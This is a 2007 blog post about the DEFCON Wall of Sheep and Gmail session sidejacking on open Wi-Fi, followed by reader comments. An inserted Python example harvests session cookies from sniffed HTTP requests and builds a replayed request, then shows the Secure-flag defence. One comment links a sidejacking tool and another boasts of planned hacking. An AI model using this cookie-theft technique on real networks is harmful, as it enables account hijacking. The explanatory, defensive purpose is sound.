DEFCON 2007 - Wall of Sheep (shame)

Summary: It's time to count sheep again and I don't mean the ones in your sleep.  I'm talking about the ones on the Wi-Fi Hotspot that are using insecure protocols and getting their online accounts compromised.


It's time to count sheep again and I don't mean the ones in your sleep.  I'm talking about the ones on the Wi-Fi Hotspot that are using insecure protocols and getting their online accounts compromised.  What you're looking at below is the DEFCON 15 Wall of Sheep.

What do I mean by compromised?  Usually it means one of two things: the username and password are transmitted in the clear for anyone on the same network to read, or the account can be hijacked because an attacker copies the session cookie that identifies your logged-in Web session and can then reuse it to get into the account whenever they want.  In the above screen shot, a VERY large number of Gmail accounts that were not using secure HTTPS (https://mail.google.com) were hijacked.  This happened even though the users logged in over HTTPS: Gmail by default automatically kicks you back into plain HTTP after login, so the session cookie is sent in the clear on every subsequent request.
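The session hijacking described above, as an added example that is not part of the original post and is not the code of Hamster or any other tool: the sniffing side pulls Cookie headers out of cleartext HTTP requests and groups them by host, the replay side builds the cloned request an attacker's browser would send, and the last function shows why a session cookie marked Secure cannot be sniffed this way. All traffic is constructed inline; the hostnames and cookie names (SID, PREF, auth, GX) are placeholders and do not reflect Gmail's real cookie layout.

```python
"""Sidejacking in miniature: harvest session cookies from cleartext HTTP and
show why the Secure cookie attribute is the fix.  Added example; all traffic
below is constructed and the hostnames/cookie names are placeholders."""

# Constructed cleartext requests, as a sniffer on an open hotspot would see them.
CAPTURED_REQUESTS = [
    b"GET /mail/ HTTP/1.1\r\nHost: mail.example.com\r\n"
    b"Cookie: SID=s3ss10n-id-123; PREF=lang=en\r\n\r\n",
    b"GET /img/logo.png HTTP/1.1\r\nHost: static.example.com\r\n\r\n",
    b"GET /mail/?ui=2 HTTP/1.1\r\nHost: mail.example.com\r\nCookie: SID=s3ss10n-id-123\r\n\r\n",
    b"GET /inbox HTTP/1.1\r\nHost: webmail.example.net\r\nCookie: auth=tok-xyz\r\n\r\n",
]


def parse_request(raw):
    """Split one raw HTTP/1.x request into method, path and lower-cased headers."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def parse_cookie_header(value):
    """'a=1; b=x=y' -> {'a': '1', 'b': 'x=y'} (split on the first '=' only)."""
    jar = {}
    for pair in value.split(";"):
        name, _, val = pair.strip().partition("=")
        if name:
            jar[name] = val
    return jar


def harvest_sessions(requests):
    """What the sniffer side of a sidejacking tool collects: {host: {cookie: value}}."""
    sessions = {}
    for raw in requests:
        req = parse_request(raw)
        host = req["headers"].get("host")
        cookie = req["headers"].get("cookie")
        if host and cookie:
            sessions.setdefault(host, {}).update(parse_cookie_header(cookie))
    return sessions


def clone_request(host, path, sessions):
    """Build the request the attacker's browser or proxy sends with the stolen cookies."""
    cookie = "; ".join(f"{k}={v}" for k, v in sessions[host].items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


def cookies_sent_over(set_cookie_headers, scheme):
    """Names of the cookies a browser would attach to a request over `scheme`.
    A cookie set with the Secure attribute is never sent over plain http, so it
    cannot be sniffed even when the site drops back to HTTP after login."""
    sent = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].partition("=")[0]
        secure = any(p.lower() == "secure" for p in parts[1:])
        if scheme == "https" or not secure:
            sent.append(name)
    return sent


if __name__ == "__main__":
    stolen = harvest_sessions(CAPTURED_REQUESTS)
    for host, jar in stolen.items():
        print(host, jar)
    print(clone_request("mail.example.com", "/mail/", stolen).decode())
    # Server-side fix: mark the session cookie Secure (and keep the site on HTTPS).
    weak = ["SID=s3ss10n-id-123; Path=/; HttpOnly"]
    fixed = ["SID=s3ss10n-id-123; Path=/; Secure; HttpOnly"]
    print("weak over http:", cookies_sent_over(weak, "http"))    # ['SID'] -> sniffable
    print("fixed over http:", cookies_sent_over(fixed, "http"))  # []
```

The defensive half is the point: a Secure cookie is simply absent from the HTTP request, so a site that redirects to HTTP after login will log the user out rather than leak the session, which is why the cookie flag only works together with keeping the whole session on HTTPS.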

The Wall of Sheep team hunts down the sheep in their command bunker

Robert Graham and David Maynor side-jacking sheep with Hamster

Learn how to protect your online privacy here.

Topics: Collaboration, Google


Talkback

10 comments
  • Not good

    This sense of smug superiority can't end well. It's a useful service, but let's not forget they're compromising the easiest targets first and foremost. Let's keep our perspective, please.

    ...and yet another homage to Maynor? Wow. Just wow. I hear there were actually other security researchers at the event. Don't be too shy to introduce yourself.
    GW Mahoney
    • They were just doing their job of sploitin'

      At least, I think that is what you are to do at DEFCON.
      nucrash
    • GMail, and millions will benefit

      Whether they are smug or not, do you think Google hasn't already got a team working at making taking over Gmail accounts harder? I would not be surprised if HTTPS became the default soon and users will have no HTTP access soon.

      TripleII
    • Your obsession has to end

      Your obsession with Maynor bashing has to end. Besides, this wasn't a Maynor project. Hamster was a Robert Graham project and it's hardly the entire story here with just one little photo at the bottom of the page.
      georgeou
      • We're still waiting

        You had promised us emails and exposes about how poor Maynor had been slimed by others.
        Robert Crocker
        • That was released back in March

          http://blogs.zdnet.com/Ou/?p=451
          georgeou
        • You may not agree

          And I don't agree either, but George did present his rationale ( http://blogs.zdnet.com/Ou/?p=451 ) and I give him credit for that.

          I didn't think Fox was out of line to publicize the fact that SecureWorks would not confirm the original claims. If someone drops a bomb that any MacBook can be remotely hijacked in 60 seconds, then they claim that their demonstration did not intend to make that claim - in other words, "we didn't say that" - *that* is a retraction. The fact is Maynor or SecureWorks should have confirmed or formally retracted their own assault, but they chose not to.

          Some people went too far, saying Maynor admitted to lying, which he clearly did not do. In the end, since it turned out to be a fraud, they were proved morally right, but it was still irresponsible reporting.

          I say fraud, because the best they could have had was something that was very hard to reproduce, which is not what was presented to Krebs. In fact, that private demo almost had to be rigged, since it worked the first time. However, since his incredible statements, "I didn't feel the need to do the entire hijack", and "This is now a dead subject for me", we should assume the worst of the remaining unanswered questions, which is to say that after months of effort he could not reproduce it on a standard MacBook.

          George may not share my opinion that David is a disgraced researcher, but when I see him or his company being used as a primary source, it's always a jolt.
          GW Mahoney
          • Again, this post has nothing to do with Maynor

            This is a Robert Graham project which he proved on stage and to me when he hijacked some Gmail accounts. The code is being released within a week.
            georgeou
          • Already posted (link)

            I think this is it:

            http://www.erratasec.com/sidejacking.zip

            I wasn't doubting that Robert had done this. I was saying that it's already been done and he was just scripting it. Does this really count as security research?

            I encourage other programmers to comment. My perception is that anyone who's written a bot could do this in one sitting.
            GW Mahoney
  • n3tw0rks4t4n

    I have a hunch that this year, the Wall of Sheep crew are going to end up being the sheep. They will not be able to perform their network plain-text pass scouring duties, once we get ahold of their boxen. They won't know when or wherefrom it hit, nor will their weak distros be able to match our challenge =) here's to hell-acious hacking! n3tw0rks4t4n
    b5981202